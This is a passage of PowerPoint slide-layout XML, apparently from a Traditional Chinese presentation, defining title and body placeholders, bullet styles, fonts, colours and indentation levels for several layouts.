            <a:lvl2pPr indent="-12689" lvl="1" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-12677" lvl="2" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-12665" lvl="3" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-12654" lvl="4" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12643" lvl="5" marL="2285943" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12631" lvl="6" marL="2743131" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12619" lvl="7" marL="3200320" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12608" lvl="8" marL="3657509" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Shape 70"/>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1_標題及物件">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="71" name="Shape 71"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Shape 72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367433" cy="4611686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-165090" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
              <a:defRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-146031" lvl="1" marL="742932" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="➢"/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-114271" lvl="2" marL="1142971"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3pPr>
            <a:lvl4pPr indent="-114259" lvl="3" marL="1600160"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4pPr>
            <a:lvl5pPr indent="-114249" lvl="4" marL="2057349"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5pPr>
            <a:lvl6pPr indent="-114237" lvl="5" marL="2514537"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6pPr>
            <a:lvl7pPr indent="-114225" lvl="6" marL="2971726"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7pPr>
            <a:lvl8pPr indent="-114213" lvl="7" marL="3428914"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8pPr>
            <a:lvl9pPr indent="-114203" lvl="8" marL="3886103"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9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Shape 73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068983" cy="827088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12689" lvl="5" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12677" lvl="6" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12665" lvl="7" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12654" lvl="8" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Shape 74"/>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標題及物件">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="22" name="Shape 22"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367433" cy="4611686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-165090" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="❑"/>
              <a:defRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-146031" lvl="1" marL="742932" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="➢"/>
              <a:defRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-114271" lvl="2" marL="1142971"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3pPr>
            <a:lvl4pPr indent="-114259" lvl="3" marL="1600160"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4pPr>
            <a:lvl5pPr indent="-114249" lvl="4" marL="2057349"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5pPr>
            <a:lvl6pPr indent="-114237" lvl="5" marL="2514537"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6pPr>
            <a:lvl7pPr indent="-114225" lvl="6" marL="2971726"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7pPr>
            <a:lvl8pPr indent="-114213" lvl="7" marL="3428914"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8pPr>
            <a:lvl9pPr indent="-114203" lvl="8" marL="3886103"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9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068983" cy="827088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12689" lvl="5" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12677" lvl="6" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12665" lvl="7" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12654" lvl="8" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 25"/>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b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>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空白">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="26" name="Shape 26"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Shape 27"/>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b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>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只有標題">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="28" name="Shape 28"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Shape 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068983" cy="827088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12689" lvl="5" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" i="0" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12677" lvl="6" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
